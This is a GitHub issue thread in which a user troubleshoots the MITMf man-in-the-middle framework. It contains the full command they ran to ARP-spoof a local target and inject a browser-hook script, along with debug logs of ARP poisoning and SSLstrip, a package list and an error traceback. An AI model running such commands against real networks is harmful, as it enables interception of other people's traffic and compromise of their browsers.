### ISSUE TITLE
MITMf not doing anything

### ISSUE THREAD

**Issue by Sector-void** [byt3bl33d3r/MITMf#369]
So, the command I use is: `python mitmf.py --spoof --arp -i wlan0 --gateway 192.168.1.1 --target 192.168.1.17 --inject --js-url http://127.0.0.1:3000/hook.js`

Output of `pip freeze`: 
Warning: cannot find svn location for chirp===daily-20161123
adns-python==1.2.1
AdvancedHTTPServer==2.0.5
alembic==0.8.8.dev0
anyjson==0.3.3
argcomplete==1.7.0
argh==0.26.2
attrs==16.3.0
backports-abc==0.5
backports.ssl-match-hostname==3.5.0.1
basemap==1.0.7
BBQSQL==1.0
BeautifulSoup==3.2.1
beautifulsoup4==4.5.1
BlindElephant==1.0
blinker==1.3
boltons==16.4.1
capstone==3.0.4
certifi==2016.2.28
chardet==2.3.0
Cheetah==2.4.4
##FIXME: could not find svn URL in dependency_links for this package:
chirp===daily-20161123
clamd==1.0.1
click==6.6
cluster==1.3.3
colorama==0.3.7
ConfigArgParse==0.11.0
configobj==5.0.6
configparser==3.3.0.post2
constantly==15.1.0
construct==2.5.2
couchdbkit==0.6.5
cryptography==1.7.1
cycler==0.10.0
d2to1==0.2.12
dap==2.2.6.7
darts.util.lru==0.5
decorator==4.0.10
defusedxml==0.4.1
dicttoxml==1.7.4
dissy==9
distorm3==3.3.4
dnslib==0.9.4
dnspython==1.15.0
docutils==0.13.1
easygui==0.96
Elixir==0.7.1
enum34==1.1.6
esmre==0.3.1
feedparser==5.1.3
file-magic==0.3.0
Flask==0.12
FormEncode==1.3.0
functools32==3.2.3.post2
fuse-python==0.2.1
future==0.15.2
futures==3.0.5
GeoIP==1.3.2
geoip2==2.4.2
geojson==1.3.1
gevent==1.1.2
gitdb2==2.0.0
GitPython==2.1.0
greenlet==0.4.10
guess-language-spirit==0.5.2
h2==2.4.1
halberd==0.2.4
hpack==2.3.0
html2text==2016.9.19
html5lib==0.999
http-parser==0.8.3
httplib2==0.9.2
httpretty==0.8.14
hyperframe==4.0.1
icalendar==3.8
idna==2.2
impacket==0.9.15
incremental==16.10.1
ipaddr==2.1.11
ipaddress==1.0.17
IPy==0.83
ipython==2.4.1
itsdangerous==0.24
jdcal==1.0
Jinja2==2.8
jsonpickle==0.9.3
jsonrpclib==0.1.3
keepnote==0.7.8
killerbee==1.0
lxml==3.6.4
M2Crypto==0.24.0
Mako==1.0.6
Markdown==2.6.7
MarkupSafe==0.23
matplotlib==2.0.0rc2
maxminddb==1.2.2
mechanize==0.2.5
mercurial==4.0
metaconfig==0.1.4a1
mitmproxy==0.17.1
mockito==0.5.2
msgpack-python==0.4.8
mysqlclient==1.3.7
nassl==0.12
ndg-httpsclient==0.4.2
netaddr==0.7.18
NetfilterQueue==0.6
NfSpy==1.0
nltk==3.2.1
numpy==1.12.0b1
olefile==0.42.1
openpyxl==2.3.0
PAM==0.4.2
paramiko==2.0.0
passlib==1.7.0.post20161128115349
Paste==2.0.3
PasteDeploy==1.5.2
PasteScript==1.7.5
pathtools==0.1.2
pbr==1.10.0
pcapy==0.10.8
pdfminer==20140328
pefile==2016.3.28
pexpect==4.2.1
phply==0.9.1
Pillow==3.4.2
ply==3.9
prettytable==0.7.2
psutil==5.0.0
psycopg2==2.6.2
ptyprocess==0.5.1
py==1.4.32
pyasn1==0.1.9
pyasn1-modules==0.0.7
pybloomfiltermmap==0.3.15
pycrypto==2.6.1
pycryptopp==0.7.1
pycurl==7.43.0
pydns==2.3.6
pyenchant==1.6.7
PyGithub==1.23.0
Pygments==2.1.3
pygobject==3.22.0
pyinotify==0.9.6
pylibemu==0.3.3
pymongo==3.3.1
pymssql==1.0.2
pyOpenSSL==16.2.0
pyotp==2.2.1
pyparsing==2.1.10
pyPdf==1.13
PyPDF2==1.26.0
pyperclip==1.5.27
pyrit==0.4.0
pyscard==1.9.4
pyserial==3.2.1
pysnmp==4.3.2
pysnmp-apps==0.3.2
pysnmp-mibs==0.1.3
PySocks==1.6.5
pysqlite==2.7.0
pytest==3.0.5
python-apt==1.1.0b5
python-dateutil==2.5.3
python-debian==0.1.29
python-debianbts==2.6.1
python-editor==0.4
python-Levenshtein==0.12.0
python-ntlm==1.1.0
python-openid==2.2.5
python-pam==1.8.2
pytz==2016.7
pyusb==1.0.0b2
PyX==0.12.1
pyxdg==0.25
PyYAML==3.12
qrcode==5.3
reportbug==6.6.6
requests==2.12.4
restkit==4.2.2
rfidiot==1.0
roman==2.0.0
ruamel.ordereddict==0.4.9
scapy===unknown.version
scgi==1.13
service-identity==16.0.0
simplegeneric==0.8.1
simplejson==3.10.0
singledispatch==3.4.0.3
six==1.10.0
slowaes==0.1a1
smmap2==2.0.1
smoke-zephyr==1.0.2
SOAPpy==0.12.22
socketpool==0.5.3
SQLAlchemy==1.0.15
stevedore==1.19.1
stopit==1.1.0
subprocess32==3.2.7
tblib==1.3.0
tcpwatch==1.3.1
Tempita==0.5.2
termcolor==1.1.0
tornado==4.4.2
Twisted==15.5.0
tzlocal==1.3
ua-parser==0.3.6
urllib3==1.19.1
urwid==1.3.1
user-agents==0.3.2
uTidylib==0.3
vinetto==0.7b0
virtualenv==15.1.0
virtualenv-clone==0.2.6
virtualenvwrapper==4.7.2
volatility==2.6
vulndb==0.0.19
wafw00f==0.9.3
wapiti==2.3.0
watchdog==0.8.3
webunit==1.3.10
Werkzeug==0.11.15
wfuzz==0.0.0
Whoosh==2.7.0
wstools==0.4.3
wxPython==3.0.2.0
wxPython-common==3.0.2.0
xdot==0.5
XlsxWriter==0.9.3
xmlbuilder==1.0
yara-python==3.5.0
zenmap==7.40
zim==0.65
zope.interface==4.3.2

Full output of debug mode:
[*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
2017-01-14 22:08:58 [ProxyPlugins] Adding Spoof plugin
|_ Spoof v0.6
2017-01-14 22:08:58 [ARPpoisoner] gatewayip  => 192.168.1.1
2017-01-14 22:08:58 [ARPpoisoner] gatewaymac => 6c:b0:ce:e8:e8:b4
2017-01-14 22:08:58 [ARPpoisoner] targets    => [IPAddress('192.168.1.17')]
2017-01-14 22:08:58 [ARPpoisoner] ignore     => []
2017-01-14 22:08:58 [ARPpoisoner] ip         => 192.168.1.17
2017-01-14 22:08:58 [ARPpoisoner] mac        => 50:63:13:c3:36:64
2017-01-14 22:08:58 [ARPpoisoner] interface  => wlan0
2017-01-14 22:08:58 [ARPpoisoner] arpmode    => rep
2017-01-14 22:08:58 [ARPpoisoner] interval   => 3
2017-01-14 22:08:58 [Utils] Setting ip forwarding to 1
2017-01-14 22:08:58 [Utils] Setting iptables HTTP redirection rule from port 80 to 10000
|  |_ ARP spoofing enabled
2017-01-14 22:08:58 [ProxyPlugins] Adding Inject plugin
|_ Inject v0.4
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ MITMf-API online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ HTTP server online
|_ DNSChef v0.4 online
|_ SMB server online

Distro & Architecture (output of uname -a):
4.6.0-kali1-686-pae #1 SMP Debian 4.6.4-1kali1 (2016-07-21) i686 GNU/Linux

No errors(?)

Sorry if the solution is trivial. I'm new to the whole thing.

**Comment by Ritiek** [comment]
@Sector-void
Try running it with less arguments.
Something like `python mitmf.py --spoof --arp -i wlan0 --gateway 192.168.1.1` and then open some webpages on a local device.

**Comment by Sector-void** [comment]
it's still stopped at this:

[*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ MITMf-API online
|_ HTTP server online
 * Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
|_ DNSChef v0.4 online
|_ SMB server online

**Comment by Sector-void** [comment]
ok, I just had to leave it for a while. Sorry for this.
If I run into any more problems, should I submit a new issue?

**Comment by Sector-void** [comment]
actually this is the error I get:
Unhandled Error
Traceback (most recent call last):
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/log.py", line 101, in callWithLogger
    
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithContext
    
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
    
  File "/usr/local/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
    
--- <exception caught here> ---
  File "/usr/local/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 597, in _doReadOrWrite
    
  File "/usr/local/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 209, in doRead
    
  File "/usr/local/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 215, in _dataReceived
    
  File "/usr/local/lib/python2.7/dist-packages/twisted/protocols/basic.py", line 571, in dataReceived
    
  File "/usr/local/lib/python2.7/dist-packages/twisted/web/http.py", line 1720, in lineReceived
    
  File "/usr/local/lib/python2.7/dist-packages/twisted/web/http.py", line 1799, in allContentReceived
    
  File "/usr/local/lib/python2.7/dist-packages/twisted/web/http.py", line 832, in requestReceived
    
  File "/root/MITMf/core/sslstrip/ClientRequest.py", line 212, in process
    
  File "/root/MITMf/core/sslstrip/ClientRequest.py", line 194, in resolveHost
    
  File "/root/MITMf/core/sslstrip/URLMonitor.py", line 64, in getResolverPort
    
  File "/root/MITMf/core/configwatcher.py", line 28, in config
    
  File "/usr/lib/python2.7/dist-packages/configobj.py", line 1229, in __init__
    
  File "/usr/lib/python2.7/dist-packages/configobj.py", line 1236, in _load
    
exceptions.IOError: [Errno 24] Too many open files: './config/mitmf.conf'

**Comment by byt3bl33d3r** [comment]
See my response in #381. Cheers
